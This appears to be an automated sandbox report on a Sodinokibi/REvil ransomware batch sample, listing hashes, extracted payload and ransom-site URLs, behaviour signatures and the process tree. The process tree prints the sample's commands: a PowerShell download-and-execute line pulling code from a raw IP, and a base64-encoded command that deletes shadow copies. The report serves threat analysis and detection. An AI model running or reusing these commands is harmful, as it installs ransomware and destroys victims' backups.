Analysis
-
max time kernel
38s -
max time network
59s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
04-06-2020 22:10
Static task
static1
Behavioral task
behavioral1
Sample
bef69b68e4cea8e3eefee8da26543509.bat
Resource
win7v200430
Behavioral task
behavioral2
Sample
bef69b68e4cea8e3eefee8da26543509.bat
Resource
win10v200430
General
-
Target
bef69b68e4cea8e3eefee8da26543509.bat
-
Size
220B
-
MD5
f506edf0fe02fe851c4ad75db6112399
-
SHA1
583ba0b7f8553e3ea3adf90de4f1750e8d989390
-
SHA256
f6d98f99d70c4be05421f3c7fddc98c074854a0e6a38659100f275804a5c187e
-
SHA512
db82f1056a21ebf451fb3bc400daf9efd94c43110f256c74653bc68f7c113a4d93e1c633c084a687cb42d391875c026fa643c221ccb1126ead3bf2d7cfaa3619
Malware Config
Extracted
http://185.103.242.78/pastes/bef69b68e4cea8e3eefee8da26543509
Extracted
C:\z51x2b3522-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/3187F5FE3E32B1A5
http://decryptor.cc/3187F5FE3E32B1A5
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Drops file in Program Files directory 17 IoCs
Processes:
powershell.exedescription ioc process File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\z51x2b3522-readme.txt powershell.exe File created \??\c:\program files\z51x2b3522-readme.txt powershell.exe File created \??\c:\program files (x86)\z51x2b3522-readme.txt powershell.exe File created \??\c:\program files\microsoft sql server compact edition\z51x2b3522-readme.txt powershell.exe File opened for modification \??\c:\program files\UninstallPop.vsdm powershell.exe File opened for modification \??\c:\program files\MeasureCompare.rtf powershell.exe File opened for modification \??\c:\program files\PingSuspend.docx powershell.exe File opened for modification \??\c:\program files\UninstallUnblock.wmv powershell.exe File opened for modification \??\c:\program files\FindUninstall.midi powershell.exe File opened for modification \??\c:\program files\SendSubmit.tif powershell.exe File opened for modification \??\c:\program files\StartEdit.php powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\z51x2b3522-readme.txt powershell.exe File opened for modification \??\c:\program files\RedoRegister.mpeg powershell.exe File opened for modification \??\c:\program files\BackupDisconnect.wmx powershell.exe File opened for modification \??\c:\program files\ConvertStep.wpl powershell.exe File opened for modification \??\c:\program files\CopyMove.dib powershell.exe File opened for modification \??\c:\program files\ExportConfirm.vst powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\t7npx3p.bmp" powershell.exe -
Suspicious behavior: EnumeratesProcesses 77 IoCs
Processes:
powershell.exepowershell.exepid process 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1536 powershell.exe 1536 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 3 1396 powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1396 powershell.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1304 wrote to memory of 1396 1304 cmd.exe powershell.exe PID 1396 wrote to memory of 1536 1396 powershell.exe powershell.exe PID 1396 wrote to memory of 1536 1396 powershell.exe powershell.exe PID 1396 wrote to memory of 1536 1396 powershell.exe powershell.exe PID 1396 wrote to memory of 1536 1396 powershell.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1396 powershell.exe Token: SeDebugPrivilege 1396 powershell.exe Token: SeDebugPrivilege 1536 powershell.exe Token: SeBackupPrivilege 656 vssvc.exe Token: SeRestorePrivilege 656 vssvc.exe Token: SeAuditPrivilege 656 vssvc.exe Token: SeTakeOwnershipPrivilege 1396 powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\bef69b68e4cea8e3eefee8da26543509.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1304 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/bef69b68e4cea8e3eefee8da26543509');Invoke-YKHKXOBCRZILZ;Start-Sleep -s 10000"2⤵
- Drops file in Program Files directory
- Sets desktop wallpaper using registry
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
PID:1396 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1536
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:656